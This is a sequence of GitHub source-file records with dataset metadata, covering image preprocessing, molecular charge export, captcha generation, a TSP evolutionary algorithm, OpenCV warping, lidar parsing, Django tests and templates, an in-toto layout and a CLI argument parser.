transforms.Normalize(mean=mean_pix, std=std_pix)\r\n img = img.astype(np.float32)/255\r\n img = img.transpose([2, 0, 1])\r\n img = img[[2, 1, 0], :, :]\r\n img = torch.tensor(img)\r\n img = img.type(torch.FloatTensor)\r\n img = normalize(img)\r\n return img\r\n","repo_name":"jshtok/StarNet","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":15519,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"33027108129","text":"import functools\nimport pickle\nfrom multiprocessing import Pool\nfrom typing import List, Optional\n\nimport click\nimport numpy\nimport rich\nimport rich.console\nimport torch\nfrom models import PartialChargeModelV1\nfrom nagl.utilities.toolkits import capture_toolkit_warnings\nfrom openff.recharge.charges.library import (\n LibraryChargeCollection,\n 
LibraryChargeParameter,\n)\nfrom openff.recharge.esp.storage import MoleculeESPRecord\nfrom openff.toolkit.topology import Molecule\nfrom rich import pretty\nfrom rich.progress import track\n\n\n@functools.lru_cache()\ndef strip_map_indices(smiles: str) -> str:\n return Molecule.from_mapped_smiles(smiles, allow_undefined_stereo=True).to_smiles(\n mapped=False\n )\n\n\ndef to_library_parameter(\n smiles: str, model_path: str\n) -> Optional[LibraryChargeParameter]:\n\n from simtk import unit as simtk_unit\n\n error_console = rich.console.Console(stderr=True)\n\n try:\n\n with capture_toolkit_warnings():\n\n molecule = Molecule.from_smiles(smiles, allow_undefined_stereo=True)\n\n model = PartialChargeModelV1.load_from_checkpoint(\n model_path, map_location=torch.device(\"cpu\")\n )\n charge_tensor = model.compute_charges(molecule).detach().numpy()\n charges = [float(x) for x in charge_tensor.flatten().tolist()]\n\n total_charge = molecule.total_charge.value_in_unit(\n simtk_unit.elementary_charge\n )\n sum_charge = sum(charges)\n\n charge_difference = total_charge - sum_charge\n assert numpy.isclose(charge_difference, 0.0, atol=1.0e-4)\n\n # Fix the summed charge not being within a strict precision of the total\n # charge\n charges = [\n charge + charge_difference / molecule.n_atoms for charge in charges\n ]\n\n smiles = molecule.to_smiles(mapped=True)\n\n return LibraryChargeParameter(smiles=smiles, value=charges)\n\n except BaseException:\n\n error_console.print(f\"failed generating charges for {smiles}\")\n error_console.print_exception()\n return None\n\n\n@click.command()\n@click.option(\n \"--input-records\",\n \"input_records_path\",\n type=click.Path(exists=True, file_okay=True, dir_okay=False),\n required=True,\n)\n@click.option(\n \"--input-checkpoint\",\n \"model_path\",\n type=click.Path(exists=True, file_okay=True, dir_okay=False),\n required=True,\n)\n@click.option(\n \"--output\",\n \"output_path\",\n type=click.Path(exists=False, file_okay=True, dir_okay=False),\n required=True,\n)\n@click.option(\"--n-processes\", type=int, default=1)\ndef main(input_records_path, model_path, output_path, n_processes):\n\n console = rich.get_console()\n pretty.install(console)\n\n with capture_toolkit_warnings():\n\n with open(input_records_path, \"rb\") as file:\n with console.status(\"loading ESP records\"):\n esp_records_test: List[MoleculeESPRecord] = pickle.load(file)[\n \"esp-records\"\n ]\n console.print(f\"loaded {len(esp_records_test)} records\")\n\n smiles = sorted(\n {\n strip_map_indices(record.tagged_smiles)\n for record in track(\n esp_records_test, description=\"finding unique SMILES\"\n )\n }\n )\n\n console.print(f\"found {len(smiles)} unique SMILES\")\n\n with Pool(processes=n_processes) as pool:\n\n to_library_parameter_func = functools.partial(\n to_library_parameter, model_path=model_path\n )\n\n parameters = list(\n track(\n pool.imap(to_library_parameter_func, smiles),\n description=\"charging\",\n total=len(smiles),\n )\n )\n\n parameters = [parameter for parameter in parameters if parameter is not None]\n charge_collection = LibraryChargeCollection(parameters=parameters)\n\n with open(output_path, \"w\") as file:\n file.write(charge_collection.json(indent=2))\n\n\nif __name__ == \"__main__\":\n 
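The main() above fans work out with multiprocessing.Pool.imap over a worker whose fixed argument is bound with functools.partial (to_library_parameter with model_path). A minimal self-contained sketch of that pattern follows; the worker function and inputs are invented here.

import functools
from multiprocessing import Pool

def scale(x, factor):
    return x * factor

if __name__ == "__main__":
    # Bind the fixed argument, as the record does with model_path=...
    worker = functools.partial(scale, factor=2)
    with Pool(processes=2) as pool:
        # imap preserves input order and yields lazily, which is why the
        # original wraps it in a progress tracker.
        print(list(pool.imap(worker, [1, 2, 3])))  # [2, 4, 6]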
main()\n","repo_name":"SimonBoothroyd/gnn-charge-models","sub_path":"train-charge-models/gnn-charge-models/export-model-charges.py","file_name":"export-model-charges.py","file_ext":"py","file_size_in_byte":4157,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"41244587280","text":"#-*- coding:utf-8 -*-\n# author:Agam\n# datetime:2018-11-05\n\n\nimport datetime\nimport random\nimport string\nfrom PIL import Image, ImageFont, ImageDraw, ImageFilter\nfrom sqlalchemy import extract, func\nfrom app.apps import db\nfrom app.models import Purchase, sales,warehouse,goods\n\n\ndef rndColor():\n '''随机颜色'''\n return (random.randint(32, 127), random.randint(32, 127), random.randint(32, 127))\n\ndef gene_text():\n '''生成4位验证码'''\n return ''.join(random.sample(string.ascii_letters+string.digits, 4))\n\ndef draw_lines(draw, num, width, height):\n '''划线'''\n for num in range(num):\n x1 = random.randint(0, width / 2)\n y1 = random.randint(0, height / 2)\n x2 = random.randint(0, width)\n y2 = random.randint(height / 2, height)\n draw.line(((x1, y1), (x2, y2)), fill='black', width=1)\n\ndef get_verify_code():\n '''生成验证码图形'''\n code = gene_text()\n # 图片大小120×50\n width, height = 120, 50\n # 新图片对象\n im = Image.new('RGB',(width, height),'white')\n # 字体\n font = ImageFont.truetype('app/static/arial.ttf', 40)\n # draw对象\n draw = ImageDraw.Draw(im)\n # 绘制字符串\n for item in range(4):\n draw.text((5+random.randint(-3,3)+23*item, 5+random.randint(-3,3)),\n text=code[item], fill=rndColor(),font=font )\n # 划线\n draw_lines(draw, 2, width, height)\n # 高斯模糊\n im = im.filter(ImageFilter.GaussianBlur(radius=1.5))\n return im, code\n\n\n\n\n\n\n# 生成编号\ndef on_created():\n nowTime = datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\"); # 生成当前时间\n randomNum = random.randint(0, 100); # 生成的随机整数n,其中0<=n<=100\n if randomNum <= 10:\n randomNum = str(0) + str(randomNum);\n uniqueNum = str(nowTime) + str(randomNum);\n return uniqueNum\n\n\n\n\n\n\n\n","repo_name":"BOTHSAVAGE/flaskDemo","sub_path":"app/admin/uilt.py","file_name":"uilt.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3451069131","text":"import re\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import rankdata\nimport copy\nimport matplotlib.pyplot as plt\n\nINF = 9999999999\n\n\nclass Individual:\n def __init__(self, genes, num_task):\n self.genes = genes\n self.genes_len = len(genes)\n self.has_2_parents = False\n self.parents = []\n self.factorial_cost = [INF] * num_task\n self.factorial_rank = [INF] * num_task\n self.scalar_fitness = INF\n self.skill_factor = None\n\n def update_skill_factor(self):\n self.skill_factor = np.argmin(self.factorial_rank, axis=0)\n\n def update_scalar_fitness(self):\n self.scalar_fitness = 1 / np.min(self.factorial_rank)\n\n\nclass Population:\n def __init__(self, genes_length, num_individual):\n self.num_individuals = num_individual\n self.individuals = [None] * num_individual\n self.genes_length = genes_length\n\n def generate(self):\n for i in range(self.num_individuals):\n genes = np.random.permutation(self.genes_length)\n individual = Individual(genes, num_task=2) # TODO: fix this\n self.individuals[i] = individual\n\n def __getitem__(self, item):\n return self.individuals[item]\n\n def __setitem__(self, key, value):\n self.individuals[key] = value\n\n def __add__(self, other):\n if not isinstance(other, Population):\n raise Exception(\"Invalid 
argument\")\n new_pop = Population(self.genes_length, self.num_individuals + other.num_individuals)\n new_pop.individuals[:self.num_individuals] = self.individuals\n new_pop.individuals[self.num_individuals:] = other.individuals\n return new_pop\n\n\ndef mutate(p):\n point_1, point_2 = sorted(np.random.choice(len(p), 2, replace=False))\n # Flip\n ret = np.copy(p)\n tmp = p[point_1:point_2 + 1]\n ret[point_1:point_2 + 1] = tmp[::-1]\n return ret\n\n\n# Partially Mapped Crossover Operator\ndef _crossover(p1, p2, point_1, point_2):\n def __crossover(p1, p2):\n child = np.empty_like(p1)\n child.fill(-1)\n child[point_1 + 1:point_2 + 1] = p2[point_1 + 1:point_2 + 1]\n for (index, value) in enumerate(child):\n if value != -1:\n continue\n p_value = p1[index]\n while p_value in child:\n p_value = p1[np.where(p2 == p_value)[0][0]]\n child[index] = p_value\n return child\n\n child_1 = __crossover(p1, p2)\n child_2 = __crossover(p2, p1)\n return child_1, child_2\n\n\nclass MFEA:\n def __init__(self, num_task):\n self.num_task = num_task\n self.cost_functions = [None] * num_task\n self.max_genes_length = 17\n self.pop_num = 10\n self.num_loop = 100\n self.rmp = 0.5 # Random mating probability\n self.pop = None\n\n def set_cost_function(self, task_index, eval_func):\n self.cost_functions[task_index] = eval_func\n\n def mutate(self, individual):\n child_genes = mutate(individual.genes)\n child = Individual(child_genes, self.num_task)\n child.has_2_parents = False\n child.parents = [individual]\n return child\n\n def crossover(self, individual_1, individual_2):\n point_1, point_2 = sorted(np.random.choice(len(individual_1.genes) - 1, 2, replace=False))\n genes_1 = individual_1.genes\n genes_2 = individual_2.genes\n child_genes_1, child_genes_2 = _crossover(genes_1, genes_2, point_1, point_2)\n child_1 = Individual(child_genes_1, self.num_task)\n child_1.parents = [individual_1, individual_2]\n child_2 = Individual(child_genes_2, self.num_task)\n child_2.parents = [individual_1, individual_2]\n return child_1, child_2\n\n def ranking(self, pop):\n num_task = self.num_task\n cost_table = np.zeros((num_task, pop.num_individuals))\n for t in range(num_task):\n for (i, individual) in enumerate(pop.individuals):\n cost_table[t][i] = individual.factorial_cost[t]\n rank_table = np.empty_like(cost_table)\n for t in range(num_task):\n rank_table[t] = rankdata(cost_table[t])\n for i in range(pop.num_individuals):\n pop[i].factorial_rank = rank_table[:, i]\n\n def run(self):\n self.pop = Population(self.max_genes_length, self.pop_num)\n pop = self.pop\n pop.generate()\n num_task = self.num_task\n pop_num = self.pop_num\n rmp = self.rmp\n # Evaluate every individual with respect every optimization task\n for t in range(num_task):\n for individual in pop.individuals:\n individual.factorial_cost[t] = self.cost_functions[t](individual)\n\n # Compute the skill factor of each individual\n self.ranking(pop)\n for individual in pop.individuals:\n individual.update_skill_factor()\n\n # Main loop\n self.history = []\n for _ in range(self.num_loop):\n # Apply genetic operators on current pop to generate an offspring pop\n offspring_pop = Population(self.max_genes_length, pop_num)\n count = 0\n while count < pop_num:\n # Assortative mating\n i1, i2 = np.random.choice(pop_num, 2, replace=False)\n idvd1 = pop[i1]\n idvd2 = pop[i2]\n rand = np.random.rand()\n if idvd1.skill_factor == idvd2.skill_factor or rand < rmp:\n child_1, child_2 = self.crossover(idvd1, idvd2)\n else:\n child_1 = self.mutate(idvd1)\n child_2 = 
self.mutate(idvd2)\n\n offspring_pop[count] = child_1\n offspring_pop[count + 1] = child_2\n count += 2\n\n # Evaluate the individuals in offspring-pop for selected optimization tasks only\n for individual in offspring_pop.individuals:\n if individual.has_2_parents:\n rand = np.random.rand()\n if rand < 0.5:\n skill_factor = individual.parents[0].skill_factor\n else:\n skill_factor = individual.parents[1].skill_factor\n else:\n skill_factor = individual.parents[0].skill_factor\n individual.factorial_cost[skill_factor] = self.cost_functions[skill_factor](individual)\n for j in range(num_task):\n if j != skill_factor:\n individual.factorial_cost[j] = INF\n\n # Concatentate offspring-pop and current pop to form and intermediate-pop\n intermediate_pop = pop + offspring_pop\n\n # Update the scalar fitness and skill factor of every individual in intermediate-pop\n self.ranking(intermediate_pop)\n for individual in intermediate_pop.individuals:\n individual.update_scalar_fitness()\n individual.update_skill_factor()\n\n # Select the fittest individuals from intermediate-pop to form the next current pop\n fitness_table = np.empty(intermediate_pop.num_individuals)\n for (i, individual) in enumerate(intermediate_pop.individuals):\n fitness_table[i] = individual.scalar_fitness\n selected_indices = np.argsort(fitness_table)[-pop_num:][::-1]\n new_individuals = []\n for i in selected_indices:\n new_individuals.append(intermediate_pop[i])\n pop = Population(self.max_genes_length, self.pop_num)\n pop.individuals = new_individuals\n self.pop = pop\n\n # Trace\n best_0 = pop.individuals[0].factorial_cost[0]\n best_1 = pop.individuals[0].factorial_cost[1]\n for individual in pop.individuals:\n best_0 = min(best_0, individual.factorial_cost[0])\n best_1 = min(best_1, individual.factorial_cost[1])\n self.history.append([best_0, best_1])\n\ndef read_matrix_file(filename):\n mat = []\n with open(filename) as f:\n lines = f.readlines()\n N = len(lines)\n for line in lines:\n mat.append(re.split(\"\\s+\", line)[1:N + 1])\n\n for i in range(N):\n for j in range(N):\n mat[i][j] = int(mat[i][j])\n return mat, N\n\n\nif __name__ == '__main__':\n mat_1, N1 = read_matrix_file(\"p01_d.txt\")\n mat_2, N2 = read_matrix_file(\"gr17_d.txt\")\n\n\n def calc_cost(genes, mat):\n sum_cost = 0\n for i in range(len(genes) - 1):\n a = genes[i]\n b = genes[i + 1]\n sum_cost += mat[a][b]\n sum_cost += mat[len(genes) - 1][0]\n return sum_cost\n\n\n def cost_func_1(individual):\n # Decode genes\n genes = np.array(individual.genes)\n genes = genes[genes < N1]\n return calc_cost(genes, mat_1)\n\n\n def cost_func_2(individual):\n return calc_cost(individual.genes, mat_2)\n\n\n tsp_mfea = MFEA(2)\n tsp_mfea.set_cost_function(0, cost_func_1)\n tsp_mfea.set_cost_function(1, cost_func_2)\n tsp_mfea.pop_num = 100\n tsp_mfea.num_loop = 400\n tsp_mfea.rmp = 0.5 # Random mating probability\n tsp_mfea.run()\n for individual in tsp_mfea.pop:\n print(individual.genes)\n print(min(individual.factorial_cost))\n plt.plot(tsp_mfea.history)\n plt.show()\n","repo_name":"dranhclub/Truck-drone-tandem-delivery-network","sub_path":"dummy/tsp_mfea.py","file_name":"tsp_mfea.py","file_ext":"py","file_size_in_byte":9386,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"30417261966","text":"import cv2\nimport time\nimport os\nimport numpy as np\n\npath = os.path.dirname(os.path.abspath(__file__))\nimg = cv2.imread(path + '/lena.png')\n\nimg_perspective = img.copy()\nh, w = img.shape[:2]\n\n# 設定四對點,並取得 
perspective 矩陣\npoint1 = np.array([[60, 40], [420, 40], [420, 510], [60, 510]], dtype=np.float32)\npoint2 = np.array([[0, 80], [w, 120], [w, 430], [0, 470]], dtype=np.float32)\nM = cv2.getPerspectiveTransform(point1, point2)\n\n# perspective 轉換\nimg_perspective = cv2.warpPerspective(img, M, (w, h))\n\n# 組合 + 顯示圖片\nimg_show = np.hstack((img, img_perspective))\nwhile True:\n cv2.imshow('perspective transform', img_show)\n k = cv2.waitKey(0)\n if k == 27:\n cv2.destroyAllWindows()\n break","repo_name":"ken3527549/1st-DL-CVMarathon","sub_path":"Day007_perspective_transformation.py","file_name":"Day007_perspective_transformation.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1951910552","text":"\n#By default input is taken as string\na=input()\nprint(type(a)) #Will return class as string \n\n\n\n\n#By default division will return float\nb=2/2\nprint(type(b)) #return float , ans is 1.0\n\n\n\n\n# convertions\nstr()\nint()\nfloat()\n \n# the things which want to convert need to written between ()\n\n\n\n\n","repo_name":"VigneshReddyJulakanti/Harry_python","sub_path":"typecasting/typecasting.py","file_name":"typecasting.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21221324805","text":"import sensor_msgs.point_cloud2 as pc2\nimport rosbag\nimport csv\nimport os\n\npath = './cole-driving-downtown'\n\n\ndef distance_from_center(x, y, z):\n return (x ** 2 + y ** 2 + z ** 2) ** .5\n\n\nwith open('lidar.csv', 'w') as lidar_file:\n file_writer = csv.writer(\n lidar_file,\n delimiter=',',\n quotechar='\"',\n quoting=csv.QUOTE_MINIMAL)\n\n file_writer.writerow([\"rosbag_time\", \"close\", \"front close\", \"front medium\", \"front far\"])\n\n bags = []\n for filename in os.listdir(path):\n if filename.endswith('.bag'):\n bags.append(path + '/' + filename)\n bags.sort()\n\n bags = sorted([rosbag.Bag(b) for b in bags])\n\n for b in bags:\n for _, msg, t in b.read_messages(topics=['/velodyne_points']):\n close = 0\n total = 0\n front_close_dot_num, front_medium_dot_num, front_far_dot_num = 0, 0, 0\n for p in pc2.read_points(msg):\n total += 1\n\n if p[2] < 0 and distance_from_center(p[0], p[1], p[2]) < 1.4:\n close += 1\n\n # front_close_dot_num\n if p[1] > -1.4 and p[1] < 1.4 and p[2] > -1.6 and p[2] < 0:\n if p[0] <= 5.4 and p[0] > 1.4:\n front_close_dot_num += 1\n elif p[0] > 5.4 and p[0] <= 9.4:\n front_medium_dot_num += 1\n elif p[0] > 9.4:\n front_far_dot_num += 1\n\n file_writer.writerow([t, close, front_close_dot_num, front_medium_dot_num, front_far_dot_num])\n","repo_name":"ananthagarwal/EECS-149-Project","sub_path":"DataOrganization/car_detection.py","file_name":"car_detection.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27128720828","text":"from django.test import TestCase\nfrom django.core.urlresolvers import reverse\nimport datetime\nimport json\nfrom mapstory.tests import MapStoryTestMixin, AdminClient\nfrom .models import Location,LocationName\nfrom skosxl.models import Notation, Concept\n\n\nclass GazTest(TestCase):\n\n fixtures = ['gaz_featuretypes_skos.json']\n def setUp(self):\n # LocationType.objects.create(code=\"PPL\", label=\"Populated Place\", definition = \"def\", citation = \"http://www.geonames.org/export/codes.html\")\n 
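For the OpenCV perspective-transform record above: getPerspectiveTransform returns the 3x3 homography M that maps each source corner to its destination in homogeneous coordinates, and warpPerspective applies that mapping per pixel. A standalone numeric check using the record's own points; the 512 stands in for the image width, which the original derives from lena.png.

import numpy as np
import cv2

point1 = np.array([[60, 40], [420, 40], [420, 510], [60, 510]], dtype=np.float32)
point2 = np.array([[0, 80], [512, 120], [512, 430], [0, 470]], dtype=np.float32)
M = cv2.getPerspectiveTransform(point1, point2)

p = np.array([60, 40, 1.0])   # first source corner, homogeneous
q = M @ p
print(q[:2] / q[2])           # ~[0. 80.], the matching destination corner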
Location.objects.create(defaultName=\"Wollongong\", locationType=LocationType.objects.first(), latitude=-34.433056 , longitude=150.883057 )\n LocationName.objects.create(name=\"Wollongong\", language='en', location=Location.objects.first() )\n LocationName.objects.create(name=\"http://dbpedia.org/resource/Wollongong\", namespace=\"http://dbpedia.org/resource/\", location=Location.objects.first() )\n \n def test_location_match(self):\n \"\"\"\n Tests finding a gazetteer entry.\n \"\"\"\n\n data = json.loads ( '''{\n \"locationType\": \"PPL\",\n \"names\": [\n {\n \"name\": \"Wollongong\",\n \"language\": \"en\"\n }\n ]\n }''' )\n \n \n c = AdminClient()\n response = c.post(reverse('matchloc'), data=json.dumps(data), content_type='application/json')\n self.assertEqual(response.status_code, 200, 'Not found: body ' + response.content )\n locr = json.loads(response.content)\n \n# import ipdb; ipdb.set_trace()\n self.assertIsInstance(locr,dict,'Response type not formatted as valid dictionary' )\n self.assertTrue(locr.has_key('name_lang'),'Response does not include name+language match list' )\n self.assertEqual(len(locr['name_lang']), 1, 'Response should contain exactly one match : ' + response.content) \n self.assertEqual(locr['name_lang'][0]['defaultName'], \"Wollongong\") \n \n data = json.loads ( '''{\n \"locationType\": \"PPL\",\n \"names\": [\n {\n \"name\": \"http://dbpedia.org/resource/Wollongong\",\n \"namespace\": \"http://dbpedia.org/resource/\"\n }\n ]\n }''' )\n \n \n c = AdminClient()\n response = c.post(reverse('matchloc'), data=json.dumps(data), content_type='application/json')\n self.assertEqual(response.status_code, 200, 'Error matching: body ' + response.content)\n locr = json.loads(response.content)\n self.assertEqual(len(locr['name_lang']), 0, 'Response should not contain name match: ' + response.content)\n self.assertEqual(len(locr['code']), 1, 'Response should not contain name match: ' + response.content) \n self.assertEqual(locr['code'][0]['defaultName'], \"Wollongong\")\n # self.assertEqual(locr['defaultName'], \"Wollongong\")\n # self.assertEqual(locr['defaultName'], \"Wollongong\") \n \n data = json.loads ( '''{\n \"locationType\": \"XXX\",\n \"names\": [\n {\n \"name\": \"Wollongong\",\n \"language\": \"en\"\n }\n ]\n }''' )\n\n c = AdminClient()\n response = c.post(reverse('matchloc'), data=json.dumps(data), content_type='application/json')\n self.assertEqual(response.status_code, 200, 'Response should be 200, with empty list')\n locr = json.loads(response.content)\n self.assertEqual(len(locr['code'])+len(locr['name_lang'])+len(locr['name']), 0, 'Response should not contain any matches: ' + response.content)\n \n def test_locationname_insert(self):\n \"\"\"\n Tests insertion of a name to a specific location .\n \"\"\"\n\n loc= Location.objects.first()\n \n c = AdminClient()\n c.login_as_admin()\n import pdb; pdb.set_trace()\n response = c.get(reverse('getloc', args=[loc.id]))\n self.assertEqual(response.status_code, 200)\n\n # test various equivalent null forms are handled\n for data in [ {\"name\":\"The Gong\",\"language\":None}, {\"name\":\"The Gong\",\"language\":''} , {\"name\":\"The Gong\"} ] :\n \n response = c.post(reverse('recordname', args=[loc.id]), data=json.dumps(data), content_type='application/json')\n self.assertEqual(response.status_code, 200,'Insert name failed')\n response = c.get(reverse('getloc', args=[loc.id]))\n self.assertEqual(response.status_code, 200,'Location not retrieved after insert of name')\n locr = json.loads(response.content)\n # 
check only one exists, and it has no language set\n count = 0\n for n in locr['names'] :\n if n['name'] == data['name'] :\n self.assertIsNone(n.get('language'),'language value should be missing')\n count +=1\n self.assertEqual( count, 1, 'Insert of name with no language failed: incorrect count {0!s}'.format( count)) \n\n # test overiding null language, and inserting new name \n for data in [ {\"name\":\"The Gong\",\"language\":'en'}, {\"name\":\"Wollongong City\",\"language\":'fr'} , {\"name\":\"Wollongong City\",\"language\":'en'} ] :\n \n response = c.post(reverse('recordname', args=[loc.id]), data=json.dumps(data), content_type='application/json')\n self.assertEqual(response.status_code, 200,'Insert name failed')\n response = c.get(reverse('getloc', args=[loc.id]))\n self.assertEqual(response.status_code, 200,'Location not retrieved after insert of name')\n locr = json.loads(response.content)\n # check only one exists, and it has no language set\n count = 0\n for n in locr['names'] :\n if n['name'] == data['name'] :\n if n['language'] == data['language'] :\n count +=1\n else :\n self.assertIsNotNone(n.get('language'),'Name with language not set should not occur after language specified for name')\n \n self.assertEqual( count, 1, 'Insert of name with no language failed: incorrect count {0!s}'.format( count)) \n \n data = {\"name\":\"732\",\"namespace\":'http://abs.gov.au/admincodes/',\"language\":''}\n response = c.post(reverse('recordname', args=[loc.id]), data=json.dumps(data), content_type='application/json')\n self.assertEqual(response.status_code, 200) \n\n response = c.get(reverse('getloc', args=[loc.id]))\n \n self.assertEqual(response.status_code, 200)\n locr = json.loads(response.content)\n \n # now we can test it - it shows up OK in the debugger here..\n \n# self.assertEqual(locr.names, m)\n ","repo_name":"rob-metalinkage/django-gazetteer","sub_path":"gazetteer/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6819,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"34142352536","text":"from securesystemslib import interface\nfrom in_toto.models.layout import Layout, Step, Inspection\nfrom in_toto.models.metadata import Metablock\n\n\ndef main():\n # Load Alice's private key to later sign the layout\n priv_key_alice = interface.import_rsa_privatekey_from_file(\"resources/keys/alice\")\n\n # Load public keys\n pub_key_alice = interface.import_rsa_publickey_from_file(\"resources/keys/alice.pub\")\n\n\n layout = Layout.read({\n \"_type\":\n \"layout\",\n \"keys\": {\n pub_key_alice[\"keyid\"]: pub_key_alice,\n },\n \"steps\": [{\n \"name\": \"clone\",\n \"expected_products\": [[\"CREATE\", \"src/*\"]],\n \"pubkeys\": [pub_key_alice[\"keyid\"]],\n \"threshold\": 1,\n },{\n \"name\": \"code-build\",\n \"pubkeys\": [pub_key_alice[\"keyid\"]],\n \"expected_command\": ['mvn', 'clean', 'install', '-DskipTests'],\n \"expected_materials\": [[\"MATCH\", \"src/*\", \"WITH\", \"PRODUCTS\",\"FROM\", \"clone\"],[\"DISALLOW\", \"*\"]],\n \"expected_products\": [\n [\"CREATE\", \"target/SpringBootHelloWorld-0.0.1.jar\"], \n [\"CREATE\", \"target/*\"],\n [\"DISALLOW\", \"*\"],\n ],\n \"threshold\": 1,\n }\n ],\n \"inspect\": [\n {\n \"name\": \"docker-build\",\n \"expected_materials\": [\n [\"MATCH\", \"target/SpringBootHelloWorld-0.0.1-SNAPSHOT.jar\", \"WITH\", \"PRODUCTS\", \"FROM\", \"code-build\"],\n ],\n \"expected_products\": [\n [\"MATCH\", \"./SpringBootHelloWorld-0.0.1-SNAPSHOT.jar\", \"WITH\", \"PRODUCTS\", 
\"FROM\", \"code-build\"]\n ],\n \"run\": [\n \"ls\"\n# \"find\",\n# \"-type\", \n# \"f\", \n# \"-name\", \n# \"SpringBootHelloWorld-0.0.1-SNAPSHOT.jar\"\n ]\n }\n ],\n })\n\n metadata = Metablock(signed=layout)\n\n # Sign and dump layout to \"root.layout\"\n metadata.sign(priv_key_alice)\n metadata.dump(\"root.layout\")\n print('Created in-toto layout as \"root.layout\".')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SaiJyothiGudibandi/supplychain-test","sub_path":"resources/keys/create_layout.py","file_name":"create_layout.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24163213649","text":"from django import template\nfrom home_app.models import Translation\nimport re\n\nregister = template.Library()\n\n\"\"\"\nTemplate tags to define a variable and to add a number to a variable not using |add only usable \nfor a display {{toto|add}}\nused in detail_view\n\"\"\"\n\n\n@register.simple_tag(takes_context=True)\ndef dis_play(context, value):\n \"\"\"\n Template tag to display datas from translation modele\n Args :\n Context --> use to get session data\n Value --> key for the translation modele\n Return:\n Field from Translation modele --> language (FR, UK..)\n \"\"\"\n try:\n language = context.request.session['language']\n except KeyError:\n language = \"UK\"\n text_to_display = Translation.get_translation(value, language)\n return text_to_display\n\n@register.filter\ndef get_error_msg(value):\n \"\"\"\n Filter to remove all the tags of an error message to get the message\n remove also some specials chars\n Args :\n The complete error message\n Return:\n The message to be displayed\n \"\"\"\n value = str(value)\n pattern = \"
<li>(.*?)</li>\"\n try:\n value = re.search(pattern, value).group(1)\n except AttributeError:\n pass\n value = re.sub(\"’\", ' ', value)\n return value\n","repo_name":"jmlm74/P11-Ameliorez-un-projet-existant-en-Python","sub_path":"products_app/templatetags/dis_play.py","file_name":"dis_play.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18875182061","text":"from __future__ import print_function\nimport os\nimport sys\nimport glob\nimport stat\nimport signal\nimport argparse\nimport subprocess\nimport tempfile\nimport json\nimport time\nimport re\n\n# ------------------------------------------------------------------------------\nclass ArgumentParser(argparse.ArgumentParser):\n\n # -------------------------------------------------------------------------\n def stable_config_path(self, arg):\n return os.path.join(\n os.path.abspath(os.path.dirname(__file__)),\n \"..\",\n \"share\",\n \"proman\",\n \"config\",\n arg\n )\n\n # -------------------------------------------------------------------------\n def site_config_path(self, arg):\n return os.path.join(\"/etc/proman\", arg)\n\n # -------------------------------------------------------------------------\n def user_config_path(self, arg):\n return os.path.join(\n os.path.expanduser(\"~\"),\n \".config\",\n \"proman\",\n arg)\n\n # -------------------------------------------------------------------------\n def config_search_paths(self, arg):\n return [\n os.path.abspath(arg),\n self.stable_config_path(arg),\n self.site_config_path(arg),\n self.user_config_path(arg)\n ]\n\n # -------------------------------------------------------------------------\n def config_search_exts(self):\n return [\".procfg\", \".json\"]\n\n # -------------------------------------------------------------------------\n def find_config_path(self, arg):\n for path in self.config_search_paths(arg):\n for ext in self.config_search_exts():\n tmp = path + ext\n if os.path.isfile(tmp):\n return tmp\n\n # -------------------------------------------------------------------------\n def config_basename(self, path):\n return os.path.splitext(os.path.basename(path))[0]\n\n # -------------------------------------------------------------------------\n def find_config_names(self):\n for path in self.config_search_paths(os.path.curdir):\n for ext in self.config_search_exts():\n for filepath in glob.glob(os.path.join(path, \"*\"+ext)):\n yield filepath\n\n # -------------------------------------------------------------------------\n def __init__(self, **kw):\n argparse.ArgumentParser.__init__(self, **kw)\n\n def config_path(arg):\n result = self.find_config_path(arg)\n return result if result else arg\n\n self.add_argument(\n dest=\"config_paths\",\n metavar=\"config\",\n type=config_path,\n nargs='*',\n help=\"\"\"\n Specifies the path to or the name of a configuration file.\n Configuration files are read in the order specified on\n the command line. Variables in later files replace variables\n from earlier files. 
If config is not a valid filesystem path,\n then following paths `%(paths)s', are searched for files with\n names specified in config, with extensions: `%(exts)s'.\n Currently visible configs: `%(configs)s'.\n \"\"\" % {\n \"paths\": \"', `\".join(self.config_search_paths(\"config\")),\n \"exts\": \"', `\".join(self.config_search_exts()),\n \"configs\": \"', `\".join([self.config_basename(x) for x in self.find_config_names()])\n }\n )\n\n def key_value(arg):\n sep = '='\n tmp = arg.split(sep)\n return (tmp[0], sep.join(tmp[1:]))\n\n self.add_argument(\n \"--set\",\n dest=\"overrides\",\n metavar=\"variable=value\",\n type=key_value,\n action=\"append\",\n default=[],\n help=\"\"\"\n Specifies new values for the config variables.\n Variables from loaded configuration files are always overriden,\n by values specified on the command-line.\n \"\"\"\n )\n\n self.add_argument(\n \"--print-config\",\n action=\"store_true\",\n default=False,\n help=\"\"\"Prints the fully loaded and merged process configuration.\"\"\"\n )\n\n self.add_argument(\n \"--dry-run\",\n action=\"store_true\",\n default=False,\n help=\"\"\"Does not actually start anything just prints selected information.\"\"\"\n )\n\n self.add_argument(\n \"-l\", \"--list\",\n 